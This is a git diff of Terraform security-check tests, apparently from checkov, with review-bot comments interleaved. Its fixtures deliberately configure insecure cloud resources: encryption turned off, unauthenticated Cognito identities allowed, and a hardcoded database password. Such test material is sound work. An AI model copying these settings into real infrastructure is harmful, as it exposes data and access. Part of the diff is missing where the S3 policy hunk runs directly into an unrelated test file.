+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/terraform/checks/resource/aws/example_APIGatewayMethodSettingsCacheEncrypted/main.tf b/tests/terraform/checks/resource/aws/example_APIGatewayMethodSettingsCacheEncrypted/main.tf
index 8e5da2ace1b..149b3d3bd96 100644
--- a/tests/terraform/checks/resource/aws/example_APIGatewayMethodSettingsCacheEncrypted/main.tf
+++ b/tests/terraform/checks/resource/aws/example_APIGatewayMethodSettingsCacheEncrypted/main.tf
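Review bot: The `relative` and `backtrack` modules from the fixture's `# unknown` group are verified only indirectly, through the passed and failed counts matching the two named sets, so a future change that starts reporting on local-path sources would surface as an unrelated count mismatch. An explicit assertion states the intent and fails with a clearer message: `self.assertFalse({"relative", "backtrack"} & (passed_check_resources | failed_check_resources))` after the two set comprehensions, with a comment such as `# local sources must produce no result at all`.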
@@ -4,7 +4,7 @@ resource "aws_api_gateway_method_settings" "fail" { method_path = "path1/GET" settings { - caching_enabled = false + caching_enabled = true metrics_enabled = false logging_level = "INFO" cache_data_encrypted = false @@ -25,3 +25,15 @@ resource "aws_api_gateway_method_settings" "pass" { data_trace_enabled = false } } + +resource "aws_api_gateway_method_settings" "pass2" { + rest_api_id = aws_api_gateway_rest_api.fail.id + stage_name = aws_api_gateway_stage.fail.stage_name + method_path = "path1/GET" + + settings { + metrics_enabled = false + logging_level = "INFO" + data_trace_enabled = false + } +} diff --git a/tests/terraform/checks/resource/aws/example_BedrockAgentEncrypted/main.tf b/tests/terraform/checks/resource/aws/example_BedrockAgentEncrypted/main.tf new file mode 100644 index 00000000000..f12adfa7520 --- /dev/null +++ b/tests/terraform/checks/resource/aws/example_BedrockAgentEncrypted/main.tf @@ -0,0 +1,10 @@ +# fail +resource "aws_bedrockagent_agent" "bedrock_agent" { + agent_name = "example_agent_name" +} + +# pass +resource "aws_bedrockagent_agent" "bedrock_agent_with_kms_key" { + agent_name = "example_agent_name" + customer_encryption_key_arn = aws_kms_key.example.arn +} \ No newline at end of file diff --git a/tests/terraform/checks/resource/aws/example_CognitoUnauthenticatedIdentities/main.tf b/tests/terraform/checks/resource/aws/example_CognitoUnauthenticatedIdentities/main.tf new file mode 100644 index 00000000000..ab3e808e7ad --- /dev/null +++ b/tests/terraform/checks/resource/aws/example_CognitoUnauthenticatedIdentities/main.tf @@ -0,0 +1,7 @@ +resource "aws_cognito_identity_pool" "pass" { + allow_unauthenticated_identities = false +} + +resource "aws_cognito_identity_pool" "fail" { + allow_unauthenticated_identities = true +} 
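Review bot: The new `pass2` block omits `caching_enabled` and `cache_data_encrypted` entirely, so it reads as a pass only because the check presumably treats an absent (default false) `caching_enabled` as "nothing to encrypt"; nothing in the fixture says so. A one-line comment above the resource, `# pass: caching is not enabled, so cache_data_encrypted is not required`, would document that, and pairs naturally with the first hunk, where `fail` had `caching_enabled` flipped to `true` so that its `cache_data_encrypted = false` is an actual finding rather than an irrelevant attribute.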
diff --git a/tests/terraform/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/main.tf b/tests/terraform/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/main.tf
new file mode 100644
index 00000000000..b5be01b1b90
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/main.tf
@@ -0,0 +1,53 @@
+resource "aws_elasticache_replication_group" "pass" {
+ automatic_failover_enabled = true
+ replication_group_id = "tf-rep-group-1"
+ node_type = "cache.m4.large"
+ parameter_group_name = "default.redis3.2"
+ port = 6379
+ at_rest_encryption_enabled = true
+ transit_encryption_enabled = true
+ auth_token = var.auth_token
+}
+
+resource "aws_elasticache_replication_group" "pass2" {
+ replication_group_id = local.replication_group_id
+ description = "Sample Redis replication group"
+ engine = "redis"
+ transit_encryption_enabled = true
+ user_group_ids = [
+ "sample-group-id"
+ ]
+}
+
+resource "aws_elasticache_replication_group" "fail" {
+ automatic_failover_enabled = true
+ replication_group_id = "tf-rep-group-2"
+ node_type = "cache.m4.large"
+ parameter_group_name = "default.redis3.2"
+ port = 6379
+ at_rest_encryption_enabled = false
+ transit_encryption_enabled = false
+}
+
+resource "aws_elasticache_replication_group" "fail2" {
+ automatic_failover_enabled = true
+ replication_group_id = "tf-rep-group-2"
+ node_type = "cache.m4.large"
+ parameter_group_name = "default.redis3.2"
+ port = 6379
+ at_rest_encryption_enabled = false
+ transit_encryption_enabled = false
+ user_group_ids = [
+ "sample-group-id"
+ ]
+}
+
+resource "aws_elasticache_replication_group" "fail3" {
+ automatic_failover_enabled = true
+ replication_group_id = "tf-rep-group-2"
+ node_type = "cache.m4.large"
+ parameter_group_name = "default.redis3.2"
+ port = 6379
+ at_rest_encryption_enabled = false
+ transit_encryption_enabled = true
+}
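Review bot: The fixture never says why `pass2` passes while `fail3` fails, although both set `transit_encryption_enabled = true` and neither carries `auth_token`; the only distinguishing attribute is `user_group_ids`, which suggests the check accepts RBAC user groups as an alternative to an auth token, but a reader has to reverse-engineer that from the resource names. The `# pass` / `# fail` markers the BedrockAgent fixture in the previous hunk uses would fit here, e.g. `# pass: in-transit encryption with RBAC user groups instead of an auth token` above `pass2` and `# fail: in-transit encryption enabled but neither auth_token nor user_group_ids` above `fail3`. `auth_token = var.auth_token` in `pass` is the right shape for a committed fixture — no literal secret.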
diff --git a/tests/terraform/checks/resource/aws/example_LaunchConfigurationEBSEncryption/main.tf b/tests/terraform/checks/resource/aws/example_LaunchConfigurationEBSEncryption/main.tf index c88e110503e..eafe4a2e0da 100644 --- a/tests/terraform/checks/resource/aws/example_LaunchConfigurationEBSEncryption/main.tf +++ b/tests/terraform/checks/resource/aws/example_LaunchConfigurationEBSEncryption/main.tf @@ -64,7 +64,7 @@ resource "aws_instance" "fail_empty_root_list" { root_block_device = var.empty_list } -resource "aws_instance" "fail_empty_ebs_list" { +resource "aws_instance" "unknown_empty_ebs_list" { image_id = "ami-123" instance_type = "t2.micro" diff --git a/tests/terraform/checks/resource/aws/example_RDSInstancePerformanceInsights/main.tf b/tests/terraform/checks/resource/aws/example_RDSInstancePerformanceInsights/main.tf index 55144481361..bf3ccb3a2f4 100644 --- a/tests/terraform/checks/resource/aws/example_RDSInstancePerformanceInsights/main.tf +++ b/tests/terraform/checks/resource/aws/example_RDSInstancePerformanceInsights/main.tf 
@@ -60,4 +60,37 @@ resource "aws_rds_cluster_instance" "pass" { engine = aws_rds_cluster.default.engine engine_version = aws_rds_cluster.default.engine_version performance_insights_enabled = true -} \ No newline at end of file +} + +resource "aws_db_instance" "unknown_engine_class_combo" { + allocated_storage = 20 + storage_type = "gp2" + engine = "mariadb" + engine_version = "10.5" + instance_class = "db.t3.micro" + name = "mydatabase" + username = "admin" + password = "yourpassword" # Use a more secure method for production + parameter_group_name = "default.mariadb10.5" + skip_final_snapshot = true + + tags = { + Name = "MyMariaDBInstance" + } +} + +resource "aws_rds_cluster_instance" "unknown_engine_defaultclass_combo" { + identifier = "aurora-cluster-demo-${count.index}" + cluster_identifier = aws_rds_cluster.default.id + instance_class = "db.t2.small" + engine = aws_rds_cluster.default.engine + engine_version = aws_rds_cluster.default.engine_version +} + +resource "aws_rds_cluster_instance" "unknown_engine_class_combo" { + identifier = "aurora-cluster-demo-${count.index}" + cluster_identifier = aws_rds_cluster.default.id + instance_class = "db.t2.small" + engine = "mysql" + engine_version = aws_rds_cluster.default.engine_version +} diff --git a/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf b/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf index ed0013d67f4..93ecbef2331 100644 --- a/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf +++ b/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf 
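Review bot: `password = "yourpassword"` in `unknown_engine_class_combo` commits a literal credential to a fixture; the inline `# Use a more secure method for production` acknowledges the problem without removing it, and repository secret scanning (including checkov's own secrets framework, should it ever be pointed at `tests/`) may flag the line. The ElastiCache fixture added in this same commit uses `auth_token = var.auth_token`; the same pattern, `password = var.password`, works here and makes the comment unnecessary. Separately, `identifier = "aurora-cluster-demo-${count.index}"` is used in both new `aws_rds_cluster_instance` blocks without a `count` argument — it appears copied from the existing `pass` block and presumably parses fine for the test, but it is not valid Terraform, so a `# not valid HCL on purpose` style note would spare the next reader a detour.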
@@ -183,3 +183,304 @@ data "aws_iam_policy_document" "test" { resources = ["${aws_s3_bucket.b.arn}/*"] } } + + +resource "aws_s3_bucket_policy" "pass_w_condition" { + bucket = "bucket" + + policy = < None: warnings.filterwarnings("ignore", category=ResourceWarning) warnings.filterwarnings("ignore", category=DeprecationWarning) + def test_DatabricksWorkspaceDBFSRootCustomerManagedKey(self): + self.go("DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey") + def test_KmsKeyPolicyIsDefined(self): self.go("KmsKeyPolicyIsDefined") @@ -50,7 +53,7 @@ def test_S3NotAllowAccessToAllAuthenticatedUsers(self): self.go("S3NotAllowAccessToAllAuthenticatedUsers") def test_CloudFrontHasCustomSSLCertificate(self): - self.go("CloudFrontHasCustomSSLCertificate") + self.go("CloudFrontHasCustomSSLCertificate") def test_CodecommitApprovalRulesAttached(self): self.go("CodecommitApprovalRulesAttached") @@ -65,7 +68,7 @@ def test_APIGatewayEndpointsUsesCertificateForAuthentication(self): self.go("APIGatewayEndpointsUsesCertificateForAuthentication") def test_APIGatewayRequestParameterValidationEnabled(self): - self.go("APIGatewayRequestParameterValidationEnabled") + self.go("APIGatewayRequestParameterValidationEnabled") def test_CloudFrontUsesSecureProtocolsForHTTPS(self): self.go("CloudFrontUsesSecureProtocolsForHTTPS") @@ -74,7 +77,7 @@ def test_EMRClusterHasSecurityConfiguration(self): self.go("EMRClusterHasSecurityConfiguration") def test_OpenSearchDomainHasFineGrainedControl(self): - self.go("OpenSearchDomainHasFineGrainedControl") + self.go("OpenSearchDomainHasFineGrainedControl") def test_VPCHasRestrictedSG(self): self.go("VPCHasRestrictedSG") @@ -89,7 +92,7 @@ def test_SGAttachedToResource(self): self.go("SGAttachedToResource") def test_EC2InstanceHasIAMRoleAttached(self): - self.go("EC2InstanceHasIAMRoleAttached") + self.go("EC2InstanceHasIAMRoleAttached") def test_StorageContainerActivityLogsNotPublic(self): self.go("StorageContainerActivityLogsNotPublic") 
@@ -116,7 +119,7 @@ def test_DMSEndpointHaveSSLConfigured(self): self.go("DMSEndpointHaveSSLConfigured") def test_ElastiCacheRedisConfiguredAutomaticFailOver(self): - self.go("ElastiCacheRedisConfiguredAutomaticFailOver") + self.go("ElastiCacheRedisConfiguredAutomaticFailOver") def test_VAconfiguredToSendReportsToAdmins(self): self.go("VAconfiguredToSendReportsToAdmins") @@ -156,7 +159,7 @@ def test_GCPDocumentAIWarehouseLocationEncryptedWithCMK(self): def test_GCPVertexInstanceEncryptedWithCMK(self): self.go("GCPVertexInstanceEncryptedWithCMK") - + def test_GCPVertexAIEndpointEncryptedWithCMK(self): self.go("GCPVertexAIEndpointEncryptedWithCMK") @@ -171,9 +174,9 @@ def test_GCPVertexWorkbenchInstanceEncryptedWithCMK(self): def test_GCPVertexWorkbenchInstanceNoPublicIp(self): self.go("GCPVertexWorkbenchInstanceNoPublicIp") - + def test_GCRContainerVulnerabilityScanningEnabled(self): - self.go("GCRContainerVulnerabilityScanningEnabled") + self.go("GCRContainerVulnerabilityScanningEnabled") def test_AzureDataFactoriesEncryptedWithCustomerManagedKey(self): self.go("AzureDataFactoriesEncryptedWithCustomerManagedKey") @@ -194,7 +197,7 @@ def test_GCPLogBucketsConfiguredUsingLock(self): self.go("GCPLogBucketsConfiguredUsingLock") def test_CloudFunctionSecureHTTPTrigger(self): - self.go("CloudFunctionSecureHTTPTrigger") + self.go("CloudFunctionSecureHTTPTrigger") def test_GCPAuditLogsConfiguredForAllServicesAndUsers(self): self.go("GCPAuditLogsConfiguredForAllServicesAndUsers") 
@@ -247,6 +250,18 @@ def test_StorageLoggingIsEnabledForBlobService(self): def test_StorageLoggingIsEnabledForTableService(self): self.go("StorageLoggingIsEnabledForTableService") + def test_SynapseLogMonitoringEnabledForSQLPool(self): + self.go("SynapseLogMonitoringEnabledForSQLPool") + + def test_SynapseSQLPoolHasSecurityAlertPolicy(self): + self.go("SynapseSQLPoolHasSecurityAlertPolicy") + + def test_SynapseSQLPoolHasVulnerabilityAssessment(self): + self.go("SynapseSQLPoolHasVulnerabilityAssessment") + + def test_SynapseWorkspaceHasExtendedAuditLogs(self): + self.go("SynapseWorkspaceHasExtendedAuditLogs") + def test_VMHasBackUpMachine(self): self.go("VMHasBackUpMachine") @@ -324,10 +339,10 @@ def test_GCPKMSKeyRingsAreNotPubliclyAccessible(self): def test_GCPContainerRegistryReposAreNotPubliclyAccessible(self): self.go("GCPContainerRegistryReposAreNotPubliclyAccessible") - + def test_GCPDialogFlowAgentLoggingEnabled(self): self.go("GCPDialogFlowAgentLoggingEnabled") - + def test_GCPDialogFlowCxAgentLoggingEnabled(self): self.go("GCPDialogFlowCxAgentLoggingEnabled") @@ -336,13 +351,13 @@ def test_GCPDialogFlowCxWebhookLoggingEnabled(self): def test_GCPVertexAIPrivateEndpoint(self): self.go("GCPVertexAIPrivateEndpoint") - + def test_GCPVertexAIPrivateIndexEndpoint(self): self.go("GCPVertexAIPrivateIndexEndpoint") def test_GCPTpuV2VmPrivateEndpoint(self): self.go("GCPTpuV2VmPrivateEndpoint") - + def test_GCPVertexRuntimePrivate(self): self.go("GCPVertexRuntimePrivate") @@ -411,7 +426,7 @@ def test_GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled(self): def test_GCPdisableAlphaClusterFeatureInKubernetesEngineClusters(self): self.go("GCPdisableAlphaClusterFeatureInKubernetesEngineClusters") - + def test_AzureContainerInstanceconfigManagedIdentity(self): self.go("AzureContainerInstanceconfigManagedIdentity") 
@@ -429,7 +444,7 @@ def test_AzureKeyVaultConfigPrivateEndpoint(self): def test_AzureStorageAccConfigWithPrivateEndpoint(self): self.go("AzureStorageAccConfigWithPrivateEndpoint") - + def test_OCI_K8EngineClusterBootVolConfigInTransitEncryption(self): self.go("OCI_K8EngineClusterBootVolConfigInTransitEncryption") @@ -456,6 +471,12 @@ def test_AzureAutomationAccConfigManagedIdentity(self): def test_AzureMariaDBserverUsingTLS_1_2(self): self.go("AzureMariaDBserverUsingTLS_1_2") + + def test_AzureMLWorkspaceWithPublicStorageAccount(self): + self.go("AzureMLWorkspaceHBIPublicNetwork") + + def test_AzureMLWorkspacePublicNetwork(self): + self.go("AzureMLWorkspacePublicNetwork") def test_AzureStorageAccountEnableSoftDelete(self): self.go("AzureStorageAccountEnableSoftDelete") @@ -496,6 +517,9 @@ def test_IBM_AppLBforVPCisPrivate(self): def test_IBM_VPCclassicAccessIsDisabled(self): self.go("IBM_VPCclassicAccessIsDisabled") + def test_SageMakerIAMPolicyOverlyPermissiveToAllTraffic(self): + self.go("SageMakerIAMPolicyOverlyPermissiveToAllTraffic") + def test_IBM_RestrictServiceIDCreationInAccountSettings(self): self.go("IBM_RestrictServiceIDCreationInAccountSettings") @@ -505,9 +529,6 @@ def test_IBM_EnableMFAatAccountLevel(self): def test_IBM_RestrictAPIkeyCreationInAccountSettings(self): self.go("IBM_RestrictAPIkeyCreationInAccountSettings") - def test_IBM_DatabasesNWaccessRestrictedToSpecificIPrange(self): - self.go("IBM_DatabasesNWaccessRestrictedToSpecificIPrange") - def test_IBM_K8sClustersAccessibleViaPrivateEndPt(self): self.go("IBM_K8sClustersAccessibleViaPrivateEndPt") diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/JsonPathRangeIncludesList.yaml b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/JsonPathRangeIncludesList.yaml new file mode 100644 index 00000000000..8471d1fd32e --- /dev/null 
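Review bot: `test_AzureMLWorkspaceWithPublicStorageAccount` runs `self.go("AzureMLWorkspaceHBIPublicNetwork")`, so its name does not match the policy it exercises, unlike every other method in this file, whose name mirrors its `go()` argument; rename it to `def test_AzureMLWorkspaceHBIPublicNetwork(self):` so a failure points at the right YAML. In the following hunk, `test_SageMakerIAMPolicyOverlyPermissiveToAllTraffic` is inserted between two IBM tests; placing it next to the other AWS tests would keep the file's loose per-provider grouping. The class these methods belong to starts outside the hunk.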
+++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/JsonPathRangeIncludesList.yaml @@ -0,0 +1,18 @@ +metadata: + name: "example" + category: "GENERAL_SECURITY" + id: "JsonPathRangeIncludesList" +scope: + provider: "AWS" +definition: + cond_type: "attribute" + resource_types: + - "test" + attribute: "range" + operator: "jsonpath_range_includes" + value: + - "400" + - 3000 + - 100 + - "1" + diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/RangeIncludesList.yaml b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/RangeIncludesList.yaml new file mode 100644 index 00000000000..2e1f66faa3b --- /dev/null +++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/RangeIncludesList.yaml @@ -0,0 +1,18 @@ +metadata: + name: "example" + category: "GENERAL_SECURITY" + id: "RangeIncludesList" +scope: + provider: "AWS" +definition: + cond_type: "attribute" + resource_types: + - "test" + attribute: "range" + operator: "range_includes" + value: + - 200 + - 3000 + - 400 + - "500" + diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/resources/main.tf b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/resources/main.tf index 518d2d7cc0a..aaceeb8387e 100644 --- a/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/resources/main.tf +++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/resources/main.tf @@ -22,6 +22,10 @@ resource "test" "pass6" { range = "2000-4000" } +resource "test" "pass7" { + range = ["2100","2000-4000","3400"] +} + resource "test" "fail1" { range = 2000 } @@ -53,3 +57,7 @@ resource "test" "fail7" { resource "test" "fail8" { range = "1000-5000-6000" } + +resource "test" "fail9" { + range = ["1000","2000-2900"] +} \ No newline at end of file 
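Review bot: The list-valued `value` in `JsonPathRangeIncludesList.yaml` and `RangeIncludesList.yaml` leaves the solver contract implicit: judging from the fixture hunk, `pass7` (`["2100","2000-4000","3400"]`) passes against `[200, 3000, 400, "500"]` while `fail9` (`["1000","2000-2900"]`) fails, which reads as "pass when any listed value falls inside any of the resource's ranges", and the mix of quoted and bare numbers looks like a deliberate coercion test. A comment above `value:` in both files, `# list form: passes when any of these values is inside one of the resource's ranges; quoted and bare numbers are both accepted`, would record that — adjust the wording if that is not the intended semantics.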
diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/test_solver.py b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/test_solver.py index f3956bc5bf5..ae1a2a0f809 100644 --- a/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/test_solver.py +++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/test_solver.py @@ -17,8 +17,9 @@ def setUp(self): def test_range_includes_int_solver(self): root_folder = 'resources' check_id = "RangeIncludesInt" - should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6'] - should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', 'test.fail8'] + should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7'] + should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', + 'test.fail8', 'test.fail9'] expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}} self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id) @@ -26,9 +27,9 @@ def test_range_includes_int_solver(self): def test_range_includes_string_solver(self): root_folder = 'resources' check_id = "RangeIncludesString" - should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6'] + should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7'] should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', - 'test.fail8'] + 'test.fail8', 'test.fail9'] expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}} self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id) 
@@ -36,8 +37,9 @@ def test_range_includes_string_solver(self): def test_range_includes_int_jsonpath_solver(self): root_folder = 'resources' check_id = "JsonPathRangeIncludesInt" - should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6'] - should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', 'test.fail8'] + should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7'] + should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', + 'test.fail8', 'test.fail9'] expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}} self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id) 
@@ -45,9 +47,29 @@ def test_range_includes_int_jsonpath_solver(self): def test_range_includes_string_jsonpath_solver(self): root_folder = 'resources' check_id = "JsonPathRangeIncludesString" - should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6'] + should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7'] should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', - 'test.fail8'] + 'test.fail8', 'test.fail9'] expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}} self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id) + + def test_range_includes_list_solver(self): + root_folder = 'resources' + check_id = "RangeIncludesList" + should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7'] + should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', + 'test.fail8', 'test.fail9'] + expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}} + + self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id) + + def test_range_includes_list_jsonpath_solver(self): + root_folder = 'resources' + check_id = "JsonPathRangeIncludesList" + should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7'] + should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', + 'test.fail8', 'test.fail9'] + expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}} + + self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id) \ No newline at end of file 
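Review bot: The two new methods repeat the same seven-entry `should_pass` and nine-entry `should_fail` lists that the four existing methods already carry, so this file now holds six identical copies that every future fixture (a `pass8`) must update in lockstep; `range_not_includes_solver/test_solver.py` in the later hunk has the same shape with the roles swapped. Hoist them to class attributes, e.g. `SHOULD_PASS = [f"test.pass{i}" for i in range(1, 8)]` and `SHOULD_FAIL = [f"test.fail{i}" for i in range(1, 10)]`, and reference them from each method. The file also ends without a trailing newline (`\ No newline at end of file`).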
diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/JsonPathRangeNotIncludesList.yaml b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/JsonPathRangeNotIncludesList.yaml
new file mode 100644
index 00000000000..bdd53a1e7a9
--- /dev/null
+++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/JsonPathRangeNotIncludesList.yaml
@@ -0,0 +1,16 @@
+metadata:
+ name: "example"
+ category: "GENERAL_SECURITY"
+ id: "JsonPathRangeNotIncludesList"
+scope:
+ provider: "AWS"
+definition:
+ cond_type: "attribute"
+ resource_types:
+ - "test"
+ attribute: "range"
+ operator: "jsonpath_range_not_includes"
+ value:
+ - "3001"
+ - 3000
+ - 3002
diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/RangeNotIncludesList.yaml b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/RangeNotIncludesList.yaml
new file mode 100644
index 00000000000..57e07c412ce
--- /dev/null
+++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/RangeNotIncludesList.yaml
@@ -0,0 +1,16 @@
+metadata:
+ name: "example"
+ category: "GENERAL_SECURITY"
+ id: "RangeNotIncludesList"
+scope:
+ provider: "AWS"
+definition:
+ cond_type: "attribute"
+ resource_types:
+ - "test"
+ attribute: "range"
+ operator: "range_not_includes"
+ value:
+ - "3000"
+ - 3001
+ - "3002"
diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/resources/main.tf b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/resources/main.tf
index 518d2d7cc0a..211a276e8ea 100644
--- a/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/resources/main.tf
+++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/resources/main.tf
@@ -22,6 +22,10 @@ resource "test" "pass6" { range = "2000-4000" } +resource "test" "pass7" { + range = ["2000-2500","3000"] +} + resource "test" "fail1" { range = 2000 } @@ -53,3 +57,7 @@ resource "test" "fail7" { resource "test" "fail8" { range = "1000-5000-6000" } + +resource "test" "fail9" { + range = ["1000-2900","3100-4000"] +} diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/test_solver.py b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/test_solver.py index fef72aa1da7..9c8739dead5 100644 --- a/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/test_solver.py +++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/test_solver.py @@ -17,8 +17,9 @@ def setUp(self): def test_range_not_includes_int_solver(self): root_folder = 'resources' check_id = "RangeNotIncludesInt" - should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6'] - should_pass = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', 'test.fail8'] + should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7'] + should_pass = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', + 'test.fail8', 'test.fail9'] expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}} self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id) 
@@ -26,9 +27,9 @@ def test_range_not_includes_int_solver(self): def test_range_not_includes_string_solver(self): root_folder = 'resources' check_id = "RangeNotIncludesString" - should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6'] + should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7'] should_pass = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', - 'test.fail8'] + 'test.fail8', 'test.fail9'] expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}} self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id) @@ -36,9 +37,9 @@ def test_range_not_includes_string_solver(self): def test_range_not_includes_int_jsonpath_solver(self): root_folder = 'resources' check_id = "JsonPathRangeNotIncludesInt" - should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6'] + should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7'] should_pass = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', - 'test.fail8'] + 'test.fail8', 'test.fail9'] expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}} self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id) 
@@ -46,9 +47,29 @@ def test_range_not_includes_int_jsonpath_solver(self): def test_range_not_includes_string_jsonpath_solver(self): root_folder = 'resources' check_id = "JsonPathRangeNotIncludesString" - should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6'] + should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7'] + should_pass = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', + 'test.fail8', 'test.fail9'] + expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}} + + self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id) + + def test_range_not_includes_list_solver(self): + root_folder = 'resources' + check_id = "RangeNotIncludesList" + should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7'] + should_pass = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', + 'test.fail8', 'test.fail9'] + expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}} + + self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id) + + def test_range_not_includes_list_jsonpath_solver(self): 